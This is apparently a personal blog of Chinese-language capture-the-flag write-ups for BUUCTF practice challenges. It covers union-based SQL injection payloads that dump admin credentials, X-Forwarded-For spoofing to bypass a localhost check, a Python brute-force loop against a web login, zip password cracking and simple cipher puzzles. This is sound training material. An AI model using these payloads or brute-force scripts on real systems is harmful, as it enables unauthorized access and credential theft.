2022年1月

BUU 22.1.11

|´・ω・)ノ

BUU SQL COURSE 1

找到了第一个地方
http://f4540384-ea58-4dea-83cf-d9c11a2bbfdb.node4.buuoj.cn:81/backend/content_detail.php?id=1

对于登录的地方,找了找好像没有什么有用的东西,就抓到一个POST

而且这个题也说是sql注入,那就考虑一下sql

然后从这里就卡住了

开始百度了。

content_detail.php?id=2 and 1=1 这样有返回的json
content_detail.php?id=2 and 1=2 这样没有返回的json
那样似乎可以说明这个sql被执行了。


?id=-1 union select 1,group_concat(distinct table_schema) from information_schema.columns
这样,联合查询,可以吧所有的库查出来。

{"title":"1","content":"information_schema,ctftraining,mysql,performance_schema,news"}


然后,对news库进行查询。
?id=-1 union select 1,group_concat(distinct table_name) from information_schema.columns where table_schema = 'news'

{"title":"1","content":"admin,contents"}

然后对admin表进行查询
?id=-1 union select 1,group_concat(distinct column_name) from information_schema.columns where table_name = 'admin'
得到:
{"title":"1","content":"id,username,password"}


然后对admin的库进行查询。
?id=-1 union select 1,group_concat(username,":",password) from admin

/backend/content_detail.php?id=-1%20union%20select%201,group_concat(username,%22:%22,password)%20from%20admin
{"title":"1","content":"admin:2346398f940ee03a8ae6a4e84dba0a9f"}

下一步

登录admin账号,密码:2346398f940ee03a8ae6a4e84dba0a9f

得到:flag{61ab7b14-b23d-498f-a804-3c98775f17aa}

备注:

select 1 from table
select anycol from table
select * from table
都是没有作用上的差别的。
但从效率上来说,1>anycol>*

BUU BURP COURSE 1

打开后显示

只能本地访问。

那么用burp直接伪造ip

X-Forwarded-For: 127.0.0.1
HTTP_X_FORWARD_FOR: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1

得到:

<form action="" method="post">
        用户名:<input type="text" name="username" value="admin"/><br>
        密码:<input type="password" name="password" value="wwoj2wio2jw93ey43eiuwdjnewkndjlwe"/><br>
        <input type="submit" value="登录"/>
</form>

然后点击登录得到

登录成功!flag{9cd39cf8-dab7-4965-9ace-1443a35c958a}

记得每次收发包都要伪造一下ip

二维码

扫描后显示secret is here

考虑可能在文件内

我傻了

改成zip直接打开了

里面有个4number.txt

那样考虑一下压缩包爆破?

↓随便下了个压缩包爆破

爆破开始
[+]QR_code.png.zip 解压密码是: 7639
[-] 耗时:0.0009925365447998047秒
[-] 累计尝试7639

得到flagCTF{vjpw_wnoei}

提交的时候要flag{vjpw_wnoei}

CTF 练习22.1.10

BUU BRUTE 1

一个比较简单的暴力密码破解,直到现在我还在爆破。

#http://5a387db8-62d8-467d-a9d7-66b0ff6fd51e.node4.buuoj.cn:81/?username=admin&password=1234

import time
import requests
headers={
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36",
}
url = 'http://5a387db8-62d8-467d-a9d7-66b0ff6fd51e.node4.buuoj.cn:81/'

f=open('./test.txt', 'w')


for i in range(0,10000):
   try:
    print(str(i).zfill(4))
    params = {"username": "admin","password":str(i).zfill(4)}
    response = requests.get(url=url, params=params, headers=headers).text
    print(str(i)+response, file=f)
    
    print(response)
   # time.sleep(0)
    if(response!="密码错误,为四位数字。"):
      time.sleep(1)
      response = requests.get(url=url, params=params, headers=headers).text
      print(str(i)+response, file=f)
      print(response)
   except:
    print("error!")
    time.sleep(1)
#0051
6490登录成功。flag{dc563b29-4f7f-4e06-9864-b93730da2614}
6490登录成功。flag{dc563b29-4f7f-4e06-9864-b93730da2614}

篱笆墙的影子

题目描述:

星星还是那颗星星哟 月亮还是那个月亮 山也还是那座山哟 梁也还是那道梁 碾子是碾子 缸是缸哟 爹是爹来娘是娘 麻油灯呵还吱吱响 点的还是那么丁点亮 哦哦 注意:得到的 flag 请包上 flag{} 提交星星还是那颗星星哟 月亮还是那个月亮 山也还是那座山哟 梁也还是那道梁 碾子是碾子 缸是缸哟 爹是爹来娘是娘 麻油灯呵还吱吱响 点的还是那么丁点亮 哦哦 注意:得到的 flag 请包上 flag{} 提交

下载的文件:
felhaagv{ewtehtehfilnakgw}

考虑篱笆和栏珊差不多意思

可得

分为2栏,解密结果为:flag{wethinkwehavetheflag}

丢失的MD5

题目描述:

注意:得到的 flag 请包上 flag{} 提交
import hashlib   
for i in range(32,127):
    for j in range(32,127):
        for k in range(32,127):
            m=hashlib.md5()
            m.update('TASC'+chr(i)+'O3RJMV'+chr(j)+'WDJKX'+chr(k)+'ZM')
            des=m.hexdigest()
            if 'e9032' in des and 'da' in des and '911513' in des:
                print des

看了一下代码,可以直接运行,一个小坑,需要用python2.7运行(安利下用docker里面弄个1804)

root@cb7c2e25b2df:~# vim waaa.py
root@cb7c2e25b2df:~# python waaa.py
e9032994dabac08080091151380478a2
root@cb7c2e25b2df:~#

得到flag{e9032994dabac08080091151380478a2}

  1. 1
  2. 2
  3. 3
  4. 4
  5. 5